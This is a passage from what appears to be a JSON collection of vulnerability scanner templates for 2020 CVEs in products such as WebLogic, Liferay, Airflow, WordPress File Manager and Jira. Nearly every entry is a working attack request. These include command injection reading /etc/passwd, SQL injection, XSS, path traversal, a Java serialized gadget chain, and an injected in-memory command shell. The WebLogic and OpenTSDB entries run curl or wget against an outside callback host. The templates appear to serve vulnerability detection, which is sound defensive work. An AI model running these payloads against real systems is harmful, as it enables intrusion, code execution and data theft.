/{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-11978","info":{"name":"Apache Airflow <=1.10.10 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /api/experimental/test HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"conf\": {\"message\": \"\\\"; touch test #\"}}\n","GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_4, \"operator\":\"BashOperator\")","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"exec_date","group":1,"regex":["\"execution_date\":\"([0-9-A-Z:+]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-9036","info":{"name":"Jeedom <=4.0.38 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>document.title = \"\";alert(document.domain);\" - Jeedom\"</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35729","info":{"name":"Klog Server <=2.41 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/actions/authenticate.php"],"body":"user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}","matchers":[{"type":"word","words":["poc-testing"]}]}]},{"id":"CVE-2020-24223","info":{"name":"Mara CMS  7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9757","info":{"name":"Craft CMS < 3.3.0 - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}","{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["MetaLinkContainer","canonical","22344"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25213","info":{"name":"WordPress File Manager Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\nContent-Type: text/plain\n\npoc-test\n--------------------------ca81ac1fececda48--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["poc.txt","added"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13167","info":{"name":"Netsweeper <=6.4.3 - Python Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5","{{BaseURL}}/webadmin/out"],"headers":{"Referer":"{{BaseURL}}/webadmin/admin/service_manager_data.php"},"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{rand_str}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36365","info":{"name":"Smartstore <4.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-8654","info":{"name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/css/eonweb.css"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 5.4', '>= 5.1')"]},{"type":"word","part":"body","words":["EyesOfNetwork"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["# VERSION : ([0-9.]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-25495","info":{"name":"Xinuo Openserver 5/6 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>hello</h1><script>alert(/{{randstr}}/)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8772","info":{"name":"WordPress InfiniteWP <1.9.4.5 - Authorization Bypass","severity":"critical"},"requests":[{"raw":["GET /?author=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Language: en-US,en;q=0.9\n","POST / HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\n_IWP_JSON_PREFIX_{{base64(\"{\\\"iwp_action\\\":\\\"add_site\\\",\\\"params\\\":{\\\"username\\\":\\\"{{username}}\\\"}}\")}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["wordpress_logged_in"]},{"type":"word","part":"body","words":["<IWPHEADER>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username","group":1,"regex":["Author:(?:[A-Za-z0-9 -\\_=\"]+)?<span(?:[A-Za-z0-9 -\\_=\"]+)?>([A-Za-z0-9]+)<\\/span>"],"internal":true,"part":"body"},{"type":"regex","name":"username","group":1,"regex":["ion: https:\\/\\/[a-z0-9.]+\\/author\\/([a-z]+)\\/"],"internal":true,"part":"header"}]}]},{"id":"CVE-2020-35338","info":{"name":"Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/"],"headers":{"Authorization":"Basic OnBva29u"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>WMT Server playout"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29164","info":{"name":"PacsOne Server <7.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=\"\" onerror=\"alert(1);\">1</img>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23517","info":{"name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15148","info":{"name":"Yii 2 < 2.0.38 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="],"matchers-condition":"and","matchers":[{"type":"word","words":["total","An internal server error occurred."],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-6637","info":{"name":"OpenSIS 7.3 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/account/index.php","{{BaseURL}}/opensis/index.php","{{BaseURL}}/index.php"],"body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQL STATEMENT:","<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15920","info":{"name":"Mida eFramework <=2.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35774","info":{"name":"twitter-server Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22210","info":{"name":"74cms - ajax_officebuilding.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=\u9326%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-13942","info":{"name":"Apache Unomi <1.5.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/context.json"],"body":"{\n  \"filters\": [\n    {\n      \"id\": \"{{id}}\",\n      \"filters\": [\n        {\n          \"condition\": {\n            \"parameterValues\": {\n              \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n            },\n            \"type\": \"profilePropertyCondition\"\n          }\n        }\n      ]\n    }\n  ],\n  \"sessionId\": \"nuclei\"\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","context-profile-id"],"condition":"and"},{"type":"regex","part":"body","regex":["(profile|session)(Id|Properties|Segments)","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3580","info":{"name":"Cisco ASA/FTD Software - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/{{randstr}}/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15050","info":{"name":"Suprema BioStar <2.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2020-8191","info":{"name":"Citrix ADC/Gateway - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /menu/stapp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-NITRO-USER: xpyZxwy6\n\nsid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</title><script>alert(31337)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14864","info":{"name":"Oracle Fusion - Directory Traversal/Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1","{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35985","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-35736","info":{"name":"GateOne 1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloads/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29227","info":{"name":"Car Rental Management System 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=/etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5847","info":{"name":"UnRaid <=6.80 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["b13928fbcfff659363d7c7d1ec008d56"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14750","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\ncmd: curl {{interactsh-url}}\nContent-Type: application/x-www-form-urlencoded\n\n_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\nfield.setAccessible(true);\nObject obj = field.get(adapter);\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\nString cmd = req.getHeader(\"cmd\");\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\nif (cmd != null) {\n    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n    res.getServletOutputStream().flush();\n    res.getWriter().write(\"\");\n}executeThread.interrupt();\n\");\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["ADMINCONSOLESESSION="]},{"type":"regex","part":"body","regex":["<html><head></head><body>(.*)</body></html>"]}]}]},{"id":"CVE-2020-35476","info":{"name":"OpenTSDB <=2.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plotted","timing","cachehit"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27866","info":{"name":"NETGEAR - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Debug Enable!"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25540","info":{"name":"ThinkAdmin 6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35580","info":{"name":"SearchBlox <9.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-13158","info":{"name":"Artica Proxy Community Edition <4.30.000000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29453","info":{"name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20285","info":{"name":"ZZcms - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /user/login.php HTTP/1.1\nHost: {{Hostname}}\nReferer: xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fromurl\" type=\"hidden\" value=\"xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-21012","info":{"name":"Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /forgot_password.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbtn_forgot=1&email=1%27%20or%20sleep(6)%23\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Hotel Booking System\")"],"condition":"and"}]}]},{"id":"CVE-2020-14179","info":{"name":"Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponent!Default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"searchers\":","\"groups\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7961","info":{"name":"Liferay Portal Unauthenticated < 7.2.1 CE GA2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /api/jsonws/invoke HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData\ncmd2: {{command}}\n\ncmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth={{to_lower(rand_text_alpha(5))}}&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D\n"],"payloads":{"command":["systeminfo","lsb_release -a"]},"matchers-condition":"and","matchers":[{"type":"regex","regex":["OS Name:.*Microsoft Windows","Distributor ID:"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Microsoft Windows (.*)","Distributor ID: (.*)"],"part":"body"}]}]},{"id":"CVE-2020-24902","info":{"name":"Quixplorer <=2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&srt=yes","My Download"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2733","info":{"name":"JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/fileDownloader?sec=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ACHCJK"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17518","info":{"name":"Apache Flink 1.5.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /jars/upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; 